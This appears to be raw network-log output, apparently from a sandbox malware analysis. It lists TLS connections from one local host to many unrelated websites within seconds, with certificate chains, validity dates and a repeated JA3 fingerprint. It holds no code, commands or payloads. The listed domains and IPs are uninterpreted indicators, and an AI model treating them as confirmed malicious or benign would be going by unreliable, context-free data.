                                                                                                                                                          Feb 16, 2021 04:31:26.975960970 CET166.62.110.232443192.168.2.349743CN=narcert.com, OU=Domain Control Validated CN=Starfield Secure Certificate Authority - G2, OU=http://certs.starfieldtech.com/repository/, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Starfield Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Starfield Secure Certificate Authority - G2, OU=http://certs.starfieldtech.com/repository/, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Starfield Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Starfield Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USFri Nov 06 03:28:50 CET 2020 Tue May 03 09:00:00 CEST 2011 Tue Sep 01 02:00:00 CEST 2009Sat Nov 06 03:12:38 CET 2021 Sat May 03 09:00:00 CEST 2031 Fri Jan 01 00:59:59 CET 2038771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=Starfield Secure Certificate Authority - G2, OU=http://certs.starfieldtech.com/repository/, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Starfield Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                          CN=Starfield Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Starfield Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USTue Sep 01 02:00:00 CEST 2009Fri Jan 01 00:59:59 CET 2038
                                                                                                                                                          Feb 16, 2021 04:31:29.180821896 CET74.220.215.94443192.168.2.349744CN=cpanel.cozycaterpillar.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Feb 09 14:58:45 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon May 10 15:58:45 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:31:30.281698942 CET91.201.60.54443192.168.2.349745CN=bbsmobler.se CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Feb 09 15:25:56 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon May 10 16:25:56 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:31:31.163449049 CET66.155.35.240443192.168.2.349746CN=baylegacy.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sun Jan 31 02:42:49 CET 2021 Wed Oct 07 21:21:40 CEST 2020Sat May 01 03:42:49 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:31:32.260010958 CET77.72.5.145443192.168.2.349748CN=trulynolen.co.uk CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBFri Feb 12 01:00:00 CET 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004Fri May 14 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025
                                                                                                                                                          CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                          Feb 16, 2021 04:31:32.630841017 CET77.72.5.145443192.168.2.349749CN=trulynolen.co.uk CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBFri Feb 12 01:00:00 CET 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004Fri May 14 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025
                                                                                                                                                          CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                          Feb 16, 2021 04:31:34.479902983 CET184.175.106.113443192.168.2.349751CN=testcoreprohealthuk.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sun Jan 17 22:25:46 CET 2021 Wed Oct 07 21:21:40 CEST 2020Sat Apr 17 23:25:46 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:31:35.336306095 CET91.195.240.117443192.168.2.349752CN=summitmarketingstrategies.com CN=Encryption Everywhere DV TLS CA - G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=Encryption Everywhere DV TLS CA - G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Jan 20 01:00:00 CET 2021 Mon Nov 27 13:46:10 CET 2017 Fri Nov 10 01:00:00 CET 2006Fri Jan 21 00:59:59 CET 2022 Sat Nov 27 13:46:10 CET 2027 Mon Nov 10 01:00:00 CET 2031771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=Encryption Everywhere DV TLS CA - G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon Nov 27 13:46:10 CET 2017Sat Nov 27 13:46:10 CET 2027
                                                                                                                                                          CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Nov 10 01:00:00 CET 2006Mon Nov 10 01:00:00 CET 2031
                                                                                                                                                          Feb 16, 2021 04:31:35.725955963 CET89.46.91.28443192.168.2.349753CN=*.bigbaguettes.eu CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sat Feb 13 23:05:50 CET 2021 Wed Oct 07 21:21:40 CEST 2020Sat May 15 00:05:50 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:31:37.303170919 CET184.168.131.241443192.168.2.349754CN=shortener.secureserver.net, O="Special Domain Services, LLC", L=Scottsdale, ST=Arizona, C=US, SERIALNUMBER=R17247303, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Arizona, OID.1.3.6.1.4.1.311.60.2.1.3=US CN=Starfield Secure Certificate Authority - G2, OU=http://certs.starfieldtech.com/repository/, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Starfield Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USCN=Starfield Secure Certificate Authority - G2, OU=http://certs.starfieldtech.com/repository/, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Starfield Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Jul 15 09:27:14 CEST 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:39:16 CEST 2004Fri Jul 15 09:27:14 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:39:16 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=Starfield Secure Certificate Authority - G2, OU=http://certs.starfieldtech.com/repository/, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Starfield Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                          CN=Starfield Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                                                          OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USTue Jun 29 19:39:16 CEST 2004Thu Jun 29 19:39:16 CEST 2034
                                                                                                                                                          Feb 16, 2021 04:31:37.793991089 CET136.243.147.81443192.168.2.349755CN=nicsell.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sun Dec 20 21:49:50 CET 2020 Wed Oct 07 21:21:40 CEST 2020Sat Mar 20 21:49:50 CET 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:31:38.162833929 CET188.165.53.185443192.168.2.349756CN=latribuessentielle.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sun Jan 03 00:40:29 CET 2021 Wed Oct 07 21:21:40 CEST 2020Sat Apr 03 01:40:29 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:31:40.012118101 CET85.234.145.174443192.168.2.349757CN=www.maratonaclubedeportugal.com CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBFri Aug 21 02:00:00 CEST 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019Sun Aug 22 01:59:59 CEST 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                                                                                                          CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                          Feb 16, 2021 04:31:41.145894051 CET85.234.145.174443192.168.2.349758CN=www.maratonaclubedeportugal.com CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBFri Aug 21 02:00:00 CEST 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019Sun Aug 22 01:59:59 CEST 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                                                                                                          CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                          Feb 16, 2021 04:31:42.278834105 CET79.137.75.185443192.168.2.349759CN=n1-headache.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Feb 11 06:25:52 CET 2021 Wed Oct 07 21:21:40 CEST 2020Wed May 12 07:25:52 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:31:42.628454924 CET185.107.227.241443192.168.2.349760CN=blgr.be CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Jan 28 14:54:23 CET 2021 Wed Oct 07 21:21:40 CEST 2020Wed Apr 28 15:54:23 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:31:43.062586069 CET104.21.78.13443192.168.2.349761CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEWed Aug 26 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Thu Aug 26 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                          Feb 16, 2021 04:31:44.152694941 CET151.139.128.10443192.168.2.349762CN=transportesycementoshidalgo.es CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sun Jan 10 07:34:23 CET 2021 Wed Oct 07 21:21:40 CEST 2020Sat Apr 10 08:34:23 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:31:44.609890938 CET159.69.118.212443192.168.2.349763CN=digivod.de CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Feb 09 00:14:34 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon May 10 01:14:34 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:31:45.824613094 CET185.98.131.150443192.168.2.349764CN=365questions.org CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 06 03:47:15 CET 2021 Wed Oct 07 21:21:40 CEST 2020Tue Apr 06 04:47:15 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:31:49.660640955 CET83.166.155.153443192.168.2.349765CN=truenyc.co CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 20 04:16:00 CET 2021 Wed Oct 07 21:21:40 CEST 2020Tue Apr 20 05:16:00 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:31:52.506124973 CET142.93.110.250443192.168.2.349766CN=ikads.org CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Jan 12 19:16:17 CET 2021 Wed Oct 07 21:21:40 CEST 2020Mon Apr 12 20:16:17 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:31:52.856070042 CET94.16.115.81443192.168.2.349767CN=theduke.de CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Feb 05 06:09:19 CET 2021 Wed Oct 07 21:21:40 CEST 2020Thu May 06 07:09:19 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:31:53.955204964 CET35.221.46.9443192.168.2.349768CN=manifestinglab.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Dec 17 18:22:17 CET 2020 Wed Oct 07 21:21:40 CEST 2020Wed Mar 17 18:22:17 CET 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:31:54.757328987 CET198.12.145.239443192.168.2.349769CN=stacyloeb.com, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USMon Aug 31 14:31:21 CEST 2020 Tue May 03 09:00:00 CEST 2011 Tue Sep 01 02:00:00 CEST 2009Wed Dec 29 17:44:00 CET 2021 Sat May 03 09:00:00 CEST 2031 Fri Jan 01 00:59:59 CET 2038771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                                                          CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue Sep 01 02:00:00 CEST 2009Fri Jan 01 00:59:59 CET 2038
                                                                                                                                                          Feb 16, 2021 04:31:57.965348959 CET144.76.225.204443192.168.2.349770CN=mediaacademy-iraq.org CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Dec 24 00:16:34 CET 2020 Wed Oct 07 21:21:40 CEST 2020Wed Mar 24 00:16:34 CET 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
